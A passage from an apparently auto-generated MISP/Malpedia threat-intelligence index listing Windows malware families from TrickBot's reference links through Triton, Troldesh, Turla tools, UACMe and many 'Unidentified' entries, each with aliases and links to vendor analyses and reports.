https://medium.com/walmartglobaltech/anchor-and-lazarus-together-again-24744e516607
https://www.splunk.com/en_us/blog/security/detecting-trickbots.html
https://medium.com/walmartglobaltech/trickbot-crews-new-cobaltstrike-loader-32c72b78e81c
https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/
https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them
http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html
https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf
https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware
https://content.fireeye.com/m-trends/rpt-m-trends-2020
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf
https://www.vkremez.com/2018/11/lets-learn-introducing-latest-trickbot.html
https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf
https://www.youtube.com/watch?v=lTywPmZEU1A
https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html
https://www.secureworks.com/research/threat-profiles/gold-blackburn
https://www.fortinet.com/blog/threat-research/global-malicious-spam-campaign-using-black-lives-matter-as-a-lure
https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a
https://www.infosecurity-magazine.com/blogs/trickbot-mikrotik-connection/
https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/
https://www.bleepingcomputer.com/news/security/trickbot-malware-mistakenly-warns-victims-that-they-are-infected/
https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/22/trickbot-fake-ips-part2.html
https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/
https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/17/trickbots-latest-trick.html
http://www.peppermalware.com/2019/03/quick-analysis-of-trickbot-sample-with.html
https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6
https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/
https://www.youtube.com/watch?v=KMcSAlS9zGE
https://cofenselabs.com/all-you-need-is-text-second-wave/
https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/
https://labs.sentinelone.com/revealing-the-trick-a-deep-dive-into-trickloader-obfuscation/
https://www.justice.gov/opa/pr/latvian-national-charged-alleged-role-transnational-cybercrime-organization
http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html
https://unit42.paloaltonetworks.com/ryuk-ransomware/
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption
https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader
https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/
https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/
https://labs.sentinelone.com/how-trickbot-hooking-engine-targets-windows-10-browsers/
https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf
https://www.bitdefender.com/files/News/CaseStudies/study/316/Bitdefender-Whitepaper-TrickBot-en-EN-interactive.pdf
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/evolving-trickbot-adds-detection-evasion-and-screen-locking-features
https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/
https://www.netscout.com/blog/asert/dropping-anchor
https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf
https://cyber.wtf/2020/08/31/trickbot-rdpscandll-password-transof/
https://www.welivesecurity.com/2020/10/12/eset-takes-part-global-operation-disrupt-trickbot/
https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident
https://blog.lumen.com/a-look-inside-the-trickbot-botnet/
https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/
https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/
https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf
https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html
https://www.bitdefender.com/files/News/CaseStudies/study/399/Bitdefender-PR-Whitepaper-Trickbot-creat5515-en-EN.pdf
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot
https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html
https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html
http://www.malware-traffic-analysis.net/2018/02/01/
https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/
https://www.secdata.com/the-trickbot-and-mikrotik/
https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/
https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware
http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html
https://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks
https://blog.cyberint.com/ryuk-crypto-ransomware
https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly/
https://www.advanced-intel.com/post/trickbot-group-launches-test-module-alerting-on-fraud-activity
https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/
https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors
https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre
https://therecord.media/trickbot-new-attacks-see-the-botnet-deploy-new-banking-module-new-ransomware/
https://www.bleepingcomputer.com/news/security/trickbot-gang-developer-arrested-when-trying-to-leave-korea/
https://eclypsium.com/2020/12/03/trickbot-now-offers-trickboot-persist-brick-profit/
https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware
https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf
https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/
https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/
https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/
https://www.kryptoslogic.com/blog/2021/02/trickbot-masrv-module/
https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/
https://unit42.paloaltonetworks.com/goodbye-mworm-hello-nworm-trickbot-updates-propagation-module/
https://www.secureworks.com/blog/trickbot-modifications-target-us-mobile-users
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/
https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf
https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot
https://www.joesecurity.org/blog/498839998833561473
https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf
https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko
https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html
https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf
https://www.bleepingcomputer.com/news/security/trickbot-now-steals-windows-active-directory-credentials/
https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html
https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-reversing-the-dropper-variant/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf
https://krebsonsecurity.com/2020/10/attacks-aimed-at-disrupting-the-trickbot-botnet/
https://www.secureworks.com/research/threat-profiles/gold-ulrick
https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/
https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree
https://twitter.com/VK_Intel/status/1328578336021483522
https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/
https://inquest.net/blog/2019/08/26/TrickBot-Memory-Analysis
https://duo.com/decipher/trickbot-up-to-its-old-tricks
https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/
https://hurricanelabs.com/splunk-tutorials/splunking-with-sysmon-part-4-detecting-trickbot/
https://securelist.com/financial-cyberthreats-in-2020/101638/
https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth
https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf
https://public.intel471.com/blog/partners-in-crime-north-koreans-and-elite-russian-speaking-cybercriminals/
https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/
https://therecord.media/us-arrests-latvian-woman-who-worked-on-trickbot-malware-source-code/
https://www.youtube.com/watch?v=EdchPEHnohw
https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html
https://redcanary.com/resources/webinars/deep-dive-process-injection/
https://www.bleepingcomputer.com/news/security/malware-tries-to-trump-security-software-with-potus-impeachment/
https://unit42.paloaltonetworks.com/trickbot-campaign-uses-fake-payroll-emails-to-conduct-phishing-attacks/
https://osint.fans/service-nsw-russia-association
https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/
https://thedfirreport.com/2021/05/02/trickbot-brief-creds-and-beacons/

Triton

Malware attacking commonly used in Industrial Control Systems (ICS) Triconex Safety Instrumented System (SIS) controllers.

The tag is: misp-galaxy:malpedia="Triton"

Triton is also known as:

HatMan
Trisis

Table 2785. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.triton
https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html
https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html
https://www.eenews.net/stories/1060123327/
https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware
https://home.treasury.gov/news/press-releases/sm1162
https://dragos.com/blog/trisis/TRISIS-01.pdf
https://us-cert.cisa.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20A%29_S508C.PDF
https://github.com/ICSrepo/TRISIS-TRITON-HATMAN
https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors
https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1538425180.pdf
https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security
https://securelist.com/apt-trends-report-q2-2019/91897/
https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf
https://www.nozominetworks.com//downloads/US/Nozomi-Networks-TRITON-The-First-SIS-Cyberattack.pdf

Trochilus RAT

The tag is: misp-galaxy:malpedia="Trochilus RAT"

Trochilus RAT is also known as:

Table 2786. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat
https://github.com/5loyd/trochilus/
https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf
https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf
https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf
https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn
https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia
https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains
https://www.secureworks.com/research/threat-profiles/bronze-vinewood
https://github.com/m0n0ph1/malware-1/tree/master/Trochilus

Troldesh

The tag is: misp-galaxy:malpedia="Troldesh"

Troldesh is also known as:

Shade

Table 2787. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.troldesh
https://securelist.com/the-shade-encryptor-a-double-threat/72087/
https://support.kaspersky.com/13059
https://blog.avast.com/ransomware-strain-troldesh-spikes
https://github.com/shade-team/keys
https://isc.sans.edu/forums/diary/More+Russian+language+malspam+pushing+Shade+Troldesh+ransomware/24668/
https://unit42.paloaltonetworks.com/shade-ransomware-hits-high-tech-wholesale-education-sectors-in-u-s-japan-india-thailand-canada/
https://www.zdnet.com/article/shade-troldesh-ransomware-shuts-down-and-releases-all-decryption-keys/
https://blog.checkpoint.com/2015/06/01/troldesh-new-ransomware-from-russia/
https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/
https://www.welivesecurity.com/2019/01/28/russia-hit-new-wave-ransomware-spam/
https://labs.bitdefender.com/2020/05/shade-troldesh-ransomware-decryption-tool/

TroubleGrabber

The tag is: misp-galaxy:malpedia="TroubleGrabber"

TroubleGrabber is also known as:

Table 2788. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.troublegrabber
https://www.netskope.com/blog/here-comes-troublegrabber-stealing-credentials-through-discord

troystealer

The tag is: misp-galaxy:malpedia="troystealer"

troystealer is also known as:

Table 2789. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.troystealer
https://seguranca-informatica.pt/troystealer-a-new-info-stealer-targeting-portuguese-internet-users

Trump Ransom

The tag is: misp-galaxy:malpedia="Trump Ransom"

Trump Ransom is also known as:

Table 2790. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.trump_ransom

Tsifiri

The tag is: misp-galaxy:malpedia="Tsifiri"

Tsifiri is also known as:

Table 2791. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.tsifiri

TurlaRPC

The tag is: misp-galaxy:malpedia="TurlaRPC"

TurlaRPC is also known as:

Table 2792. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_rpc
https://unit42.paloaltonetworks.com/ironnetinjector/
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity
https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/

Turla SilentMoon

The tag is: misp-galaxy:malpedia="Turla SilentMoon"

Turla SilentMoon is also known as:

BigBoss
Cacao
GoldenSky
HyperStack

Table 2793. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_silentmoon
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://twitter.com/Arkbird_SOLG/status/1304187749373800455
https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity

TURNEDUP

The tag is: misp-galaxy:malpedia="TURNEDUP"

TURNEDUP is also known as:

Notestuk

Table 2794. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup
https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage
https://www.cyberbit.com/new-early-bird-code-injection-technique-discovered/
https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/
https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html

TypeHash

The tag is: misp-galaxy:malpedia="TypeHash"

TypeHash is also known as:

SkinnyD

Table 2795. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.typehash
https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf
https://vblocalhost.com/uploads/VB2020-Lunghi-Horejsi.pdf

Tyupkin

The tag is: misp-galaxy:malpedia="Tyupkin"

Tyupkin is also known as:

Table 2796. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.tyupkin
https://www.lastline.com/labsblog/tyupkin-atm-malware/
https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf
https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html

T-RAT 2.0

The tag is: misp-galaxy:malpedia="T-RAT 2.0"

T-RAT 2.0 is also known as:

Table 2797. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.t_rat
https://www.gdatasoftware.com/blog/trat-control-via-smartphone

UACMe

A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors.

The tag is: misp-galaxy:malpedia="UACMe"

UACMe is also known as:

Akagi

Table 2798. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme
https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/
https://github.com/hfiref0x/UACME

UDPoS

The tag is: misp-galaxy:malpedia="UDPoS"

UDPoS is also known as:

Table 2799. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.udpos
https://threatmatrix.cylance.com/en_us/home/threat-spotlight-inside-udpos-malware.html
https://www.forcepoint.com/blog/x-labs/udpos-exfiltrating-credit-card-data-dns

UFR Stealer

Information stealer.

The tag is: misp-galaxy:malpedia="UFR Stealer"

UFR Stealer is also known as:

Usteal

Table 2800. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ufrstealer
https://twitter.com/malwrhunterteam/status/1096363455769202688
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Usteal

Uiwix

The tag is: misp-galaxy:malpedia="Uiwix"

Uiwix is also known as:

Table 2801. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.uiwix
https://www.minerva-labs.com/post/uiwix-evasive-ransomware-exploiting-eternalblue

Unidentified 001

The tag is: misp-galaxy:malpedia="Unidentified 001"

Unidentified 001 is also known as:

Table 2802. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_001

Unidentified 003

The tag is: misp-galaxy:malpedia="Unidentified 003"

Unidentified 003 is also known as:

Table 2803. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_003

Unidentified 006

The tag is: misp-galaxy:malpedia="Unidentified 006"

Unidentified 006 is also known as:

Table 2804. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_006

Unidentified 013 (Korean)

The tag is: misp-galaxy:malpedia="Unidentified 013 (Korean)"

Unidentified 013 (Korean) is also known as:

Table 2805. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_013_korean_malware
http://blog.talosintelligence.com/2017/02/korean-maldoc.html

Unidentified 020 (Vault7)

The tag is: misp-galaxy:malpedia="Unidentified 020 (Vault7)"

Unidentified 020 (Vault7) is also known as:

Table 2806. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_020_cia_vault7
https://wikileaks.org/ciav7p1/cms/page_34308128.html

Unidentified 022 (Ransom)

The tag is: misp-galaxy:malpedia="Unidentified 022 (Ransom)"

Unidentified 022 (Ransom) is also known as:

Table 2807. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_022_ransom

Unidentified 023

The tag is: misp-galaxy:malpedia="Unidentified 023"

Unidentified 023 is also known as:

Table 2808. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_023

Unidentified 024 (Ransomware)

The tag is: misp-galaxy:malpedia="Unidentified 024 (Ransomware)"

Unidentified 024 (Ransomware) is also known as:

Table 2809. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_024_ransom
https://twitter.com/malwrhunterteam/status/789161704106127360

Unidentified 025 (Clickfraud)

The tag is: misp-galaxy:malpedia="Unidentified 025 (Clickfraud)"

Unidentified 025 (Clickfraud) is also known as:

Table 2810. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_025_clickfraud
http://malware-traffic-analysis.net/2016/05/09/index.html

Unidentified 028

The tag is: misp-galaxy:malpedia="Unidentified 028"

Unidentified 028 is also known as:

Table 2811. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_028

Unidentified 029

The tag is: misp-galaxy:malpedia="Unidentified 029"

Unidentified 029 is also known as:

Table 2812. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_029

Filecoder

The tag is: misp-galaxy:malpedia="Filecoder"

Filecoder is also known as:

Table 2813. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_030
https://twitter.com/JaromirHorejsi/status/877811773826641920

Unidentified 031

The tag is: misp-galaxy:malpedia="Unidentified 031"

Unidentified 031 is also known as:

Table 2814. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_031

Unidentified 037

The tag is: misp-galaxy:malpedia="Unidentified 037"

Unidentified 037 is also known as:

Table 2815. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_037

Unidentified 038

The tag is: misp-galaxy:malpedia="Unidentified 038"

Unidentified 038 is also known as:

Table 2816. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_038

Unidentified 039

The tag is: misp-galaxy:malpedia="Unidentified 039"

Unidentified 039 is also known as:

Table 2817. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_039

Unidentified 041

The tag is: misp-galaxy:malpedia="Unidentified 041"

Unidentified 041 is also known as:

Table 2818. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_041

Unidentified 042

The tag is: misp-galaxy:malpedia="Unidentified 042"

Unidentified 042 is also known as:

Table 2819. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_042
http://www.intezer.com/lazarus-group-targets-more-cryptocurrency-exchanges-and-fintech-companies/

Unidentified 044

The tag is: misp-galaxy:malpedia="Unidentified 044"

Unidentified 044 is also known as:

Table 2820. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_044

Unidentified 045

The tag is: misp-galaxy:malpedia="Unidentified 045"

Unidentified 045 is also known as:

Table 2821. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_045

Unidentified 047

RAT written in Delphi used by Patchwork APT.

The tag is: misp-galaxy:malpedia="Unidentified 047"

Unidentified 047 is also known as:

Table 2822. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_047
https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/

Unidentified 052

The tag is: misp-galaxy:malpedia="Unidentified 052"

Unidentified 052 is also known as:

Table 2823. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_052

Unidentified 053 (Wonknu?)

The tag is: misp-galaxy:malpedia="Unidentified 053 (Wonknu?)"

Unidentified 053 (Wonknu?) is also known as:

Table 2824. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_053

Unidentified 057

Unnamed portscanner as used in the Australian Parliament Hack (Feb 2019).

The tag is: misp-galaxy:malpedia="Unidentified 057"

Unidentified 057 is also known as:

Table 2825. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_057
https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/

Unidentified 058

The tag is: misp-galaxy:malpedia="Unidentified 058"

Unidentified 058 is also known as:

Table 2826. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_058
https://securelist.com/the-evolution-of-brazilian-malware/74325/#rat
https://securelist.com/the-return-of-the-bom/90065/

win.unidentified_059

The tag is: misp-galaxy:malpedia="win.unidentified_059"

win.unidentified_059 is also known as:

Table 2827. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_059

Unidentified 061

Was previously wrongly tagged as PoweliksDropper, now looking for additional context.

The tag is: misp-galaxy:malpedia="Unidentified 061"

Unidentified 061 is also known as:

Table 2828. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_061

Unidentified 063 (Lazarus Keylogger)

The tag is: misp-galaxy:malpedia="Unidentified 063 (Lazarus Keylogger)"

Unidentified 063 (Lazarus Keylogger) is also known as:

Table 2829. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_063
https://twitter.com/KevinPerlow/status/1160766519615381504

Unidentified 066

This .net executable can receive commands from c2 sever, upload and download files according to the returned content, perform an uninstall, or modify the registry to achieve persistence across reboots. At the end, it downloads a Python-based RAT, called PeppyRAT.

The tag is: misp-galaxy:malpedia="Unidentified 066"

Unidentified 066 is also known as:

Table 2830. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_066
https://s.tencent.com/research/report/669.html

Unidentified 067

The tag is: misp-galaxy:malpedia="Unidentified 067"

Unidentified 067 is also known as:

Table 2831. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_067
https://s.tencent.com/research/report/831.html

Unidentified 068

The tag is: misp-galaxy:malpedia="Unidentified 068"

Unidentified 068 is also known as:

Table 2832. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_068
https://rules.emergingthreatspro.com/changelogs/suricata-5.0-enhanced.etpro.2019-12-05T23:38:02.txt

Unidentified 069 (Zeus Unnamed2)

Zeus derivate, no known public references.

The tag is: misp-galaxy:malpedia="Unidentified 069 (Zeus Unnamed2)"

Unidentified 069 (Zeus Unnamed2) is also known as:

Table 2833. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_069
https://zeusmuseum.com/unnamed%202/

Unidentified 070 (Downloader)

Unidentified downloader, possibly related to KONNI.

The tag is: misp-galaxy:malpedia="Unidentified 070 (Downloader)"

Unidentified 070 (Downloader) is also known as:

Table 2834. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_070
https://twitter.com/M11Sec/status/1217781224204357633

Unidentified 071 (Zeus Unnamed1)

The tag is: misp-galaxy:malpedia="Unidentified 071 (Zeus Unnamed1)"

Unidentified 071 (Zeus Unnamed1) is also known as:

Table 2835. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_071
https://zeusmuseum.com/unnamed%201/

Unidentified 072 (Metamorfo Loader)

MSI-based loader that has been observed as a stager for win.metamorfo.

The tag is: misp-galaxy:malpedia="Unidentified 072 (Metamorfo Loader)"

Unidentified 072 (Metamorfo Loader) is also known as:

Table 2836. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_072
https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/metamorfo.md

Unidentified 073 (Charming Kitten)

The tag is: misp-galaxy:malpedia="Unidentified 073 (Charming Kitten)"

Unidentified 073 (Charming Kitten) is also known as:

Table 2837. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_073
https://blog.certfa.com/posts/fake-interview-the-new-activity-of-charming-kitten/

Unidentified 074 (Downloader)

The tag is: misp-galaxy:malpedia="Unidentified 074 (Downloader)"

Unidentified 074 (Downloader) is also known as:

Table 2838. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_074
https://blog.vincss.net/2019/12/re009-phan-tich-ma-doc-ke-hoach-nhiem-vu-trong-tam-2020.html

Unidentified 075

Unpacked http_dll.dat from the blog post.

The tag is: misp-galaxy:malpedia="Unidentified 075"

Unidentified 075 is also known as:

Table 2839. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_075
https://blog.vincss.net/2020/03/re012-phan-tich-ma-doc-loi-dung-dich-COVID-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-Nguyen-Xuan-Phuc.html

Unidentified 076 (Higaisa LNK to Shellcode)

The tag is: misp-galaxy:malpedia="Unidentified 076 (Higaisa LNK to Shellcode)"

Unidentified 076 (Higaisa LNK to Shellcode) is also known as:

Table 2840. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_076
https://www.zscaler.com/blogs/research/return-higaisa-apt
https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html
https://www.youtube.com/watch?v=8x-pGlWpIYI

Unidentified 077 (Lazarus Downloader)

